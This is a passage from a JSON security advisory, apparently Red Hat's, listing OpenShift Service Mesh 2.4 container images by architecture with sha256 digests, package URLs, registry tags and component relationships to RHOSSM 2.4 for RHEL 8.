"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x"
},
